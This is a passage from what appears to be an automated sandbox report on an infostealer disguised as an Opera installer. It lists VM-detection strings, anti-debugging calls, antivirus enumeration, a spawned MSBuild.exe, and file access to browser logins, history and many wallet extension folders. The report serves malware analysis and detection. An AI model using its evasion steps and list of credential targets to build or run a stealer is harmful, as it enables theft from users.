                        Source: is-SBTFQ.tmp.10.drBinary or memory string: AdditionsFacilityType_VBoxGuestDriverWWW
                        Source: is-SBTFQ.tmp.10.drBinary or memory string: !0R4AdditionsFacilityType_VBoxServiceWWW
                        Source: is-SBTFQ.tmp.10.drBinary or memory string: PartitionType_VMWareVMFS@
                        Source: MSBuild.exe, 0000000D.00000002.2952072079.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                        Source: is-SBTFQ.tmp.10.drBinary or memory string: AdditionsFacilityType_VBoxTrayClient
                        Source: is-SBTFQ.tmp.10.drBinary or memory string: PartitionType_VMWareReserved@
                        Source: is-SBTFQ.tmp.10.drBinary or memory string: aVmNetTx
                        Source: OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                        Source: cmd.exe.0.drBinary or memory string: QEMuB-
                        Source: is-SBTFQ.tmp.10.drBinary or memory string: aVmNetRx
                        Source: MSBuild.exe, 0000000D.00000002.2952072079.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2951710286.0000000000FAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                        Source: cmd.tmp, 00000008.00000002.2363683894.0000000000668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C,M|
                        Source: is-SBTFQ.tmp.10.drBinary or memory string: PartitionType_VMWareVMKCoreW@
                        Source: powershell.exe, 00000000.00000002.2384360548.000000000795D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00446040 LdrInitializeThunk,13_2_00446040
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EA6B4B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00EA6B4B
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_029B03C1 mov edx, dword ptr fs:[00000030h]12_2_029B03C1
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_029B0981 mov eax, dword ptr fs:[00000030h]12_2_029B0981
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_029B0FD1 mov eax, dword ptr fs:[00000030h]12_2_029B0FD1
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_029B0FD0 mov eax, dword ptr fs:[00000030h]12_2_029B0FD0
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_029B0D31 mov eax, dword ptr fs:[00000030h]12_2_029B0D31
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EB1690 GetProcessHeap,12_2_00EB1690
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EA6B4B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00EA6B4B
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EA0F3B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00EA0F3B
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EA1993 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00EA1993
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EA1B20 SetUnhandledExceptionFilter,12_2_00EA1B20
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpProcess created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe" /VERYSILENTJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: GetLocaleInfoW,12_2_00EB4082
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00EB415E
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: GetLocaleInfoEx,FormatMessageA,12_2_00EA2707
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: EnumSystemLocalesW,12_2_00EAD08E
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: GetLocaleInfoW,12_2_00EAD557
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,12_2_00EB37E0
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: EnumSystemLocalesW,12_2_00EB3ADD
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: EnumSystemLocalesW,12_2_00EB3A92
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: EnumSystemLocalesW,12_2_00EB3B78
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00EB3C03
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: GetLocaleInfoW,12_2_00EB3E57
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00EB3F7C
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\wEY98gM1Jj.ps1 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EA1B8A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00EA1B8A
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00E81C5E GetVersion,GetModuleHandleW,GetProcAddress,GetSystemDirectoryW,LoadLibraryExW,12_2_00E81C5E
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: cmd.exe, 00000007.00000003.2366781535.00000000021DA000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 00000008.00000003.2359613822.0000000002215000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 00000008.00000003.2359613822.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.2574767782.0000000002251000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571640217.00000000022B8000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571640217.0000000002299000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571640217.0000000002333000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032F6000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571640217.000000000232B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe.0.drBinary or memory string: avgui.exe
                        Source: MSBuild.exe, 0000000D.00000002.2953388401.0000000003670000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 13.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2951364094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
